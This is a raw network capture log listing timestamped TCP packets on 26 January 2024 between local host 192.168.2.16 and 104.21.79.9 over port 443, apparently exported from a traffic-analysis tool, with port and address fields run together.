                                                                                                                                                                                    Jan 26, 2024 14:41:52.072096109 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.072210073 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.072211981 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.072225094 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.072254896 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.072267056 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.072288990 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.072293997 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.072319984 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.073143959 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.073210955 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.073218107 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.073261023 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.073873997 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.073930025 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.073941946 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.073987961 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.074717045 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.074776888 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.075050116 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.075103045 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.075907946 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.075946093 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.075970888 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.075978041 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.076004028 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.076023102 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.076780081 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.076838017 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.077593088 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.077646017 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.077656984 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.077687025 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.077714920 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.078524113 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.078574896 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.078583002 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.078622103 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.079240084 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.079301119 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.079344988 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.079395056 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.080101013 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.080189943 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.081018925 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.081058025 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.081080914 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.081093073 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.081109047 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.081796885 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.081851006 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.081859112 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.081902981 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.082685947 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.082750082 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.083499908 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.083509922 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.083580017 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.084640980 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.084718943 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.084726095 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.084770918 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.086452961 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.086474895 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.086530924 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.086538076 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.086574078 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.086591959 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.087277889 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.087332964 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.087338924 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.087379932 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.087409973 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.087454081 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.091412067 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.092093945 CET49772443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.092101097 CET44349772104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.141304016 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.141344070 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.141396046 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.141738892 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.141752958 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.142424107 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.142455101 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.142505884 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.142740965 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.142751932 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.143501997 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.143526077 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.143580914 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.143827915 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.143843889 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.390752077 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.391002893 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.391021013 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.391380072 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.391657114 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.391716957 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.391978979 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.402420998 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.402677059 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.402695894 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.403151035 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.403434038 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.403525114 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.403588057 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.405117035 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.405297041 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.405328989 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.406773090 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.406837940 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.407103062 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.407187939 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.407224894 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.437946081 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.447164059 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.447176933 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.449903011 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.495143890 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923314095 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923479080 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923540115 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923557997 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923643112 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923691034 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923701048 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923821926 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923887014 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923897982 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.923995018 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924041986 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924051046 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924140930 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924187899 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924196959 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924288034 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924335957 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924343109 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924441099 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924489021 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924495935 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924706936 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.924760103 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.930691004 CET49775443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.930702925 CET44349775104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936368942 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936430931 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936455965 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936486006 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936495066 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936506033 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936517000 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936537027 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936561108 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936569929 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936795950 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936813116 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936836004 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936841965 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.936877966 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.937311888 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.937351942 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.937385082 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.937396049 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.937401056 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.937438965 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938143015 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938173056 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938213110 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938215017 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938241959 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938282013 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938287020 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938903093 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938930035 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938946962 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938949108 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938955069 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.938997984 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.939717054 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.939766884 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.939800024 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.939856052 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.939874887 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.939897060 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.939903021 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.939937115 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.940553904 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.940625906 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.940644979 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.940663099 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.940669060 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.940702915 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.941375017 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.941474915 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.941497087 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.941514969 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.941517115 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.941523075 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.941560030 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.942214012 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.942259073 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.942306042 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.942342043 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.942361116 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.942375898 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.942382097 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.942419052 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.943118095 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.943173885 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949174881 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949220896 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949249029 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949273109 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949275017 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949285984 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949328899 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949359894 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949393988 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949399948 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949419022 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949457884 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.949464083 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950076103 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950099945 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950119972 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950134993 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950139999 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950165033 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950928926 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950948954 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950970888 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950974941 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.950979948 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.951008081 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.951742887 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.951770067 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.951790094 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.951807022 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.951811075 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.951831102 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.952491999 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.952541113 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.952545881 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.952579021 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.952600956 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.952619076 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:52.952620983 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.952636957 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:52.952655077 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.006190062 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.006216049 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.047823906 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.047924042 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.047925949 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.047951937 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.047997952 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.048736095 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.049078941 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.049160004 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.049160957 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.049185038 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.049227953 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.049468040 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.049619913 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.049662113 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.049669027 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.050184965 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.050240993 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.050247908 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.050348043 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.050390005 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.050395012 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.050961971 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.051021099 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.051026106 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.051054955 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.051058054 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.051084042 CET44349774104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.051141024 CET49774443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.054287910 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.054374933 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.054728031 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.054766893 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.054766893 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.054779053 CET44349773104.21.79.9192.168.2.16
                                                                                                                                                                                    Jan 26, 2024 14:41:53.054811954 CET49773443192.168.2.16104.21.79.9
                                                                                                                                                                                    Jan 26, 2024 14:41:53.055361986 CET44349773104.21.79.9192.168.2.16
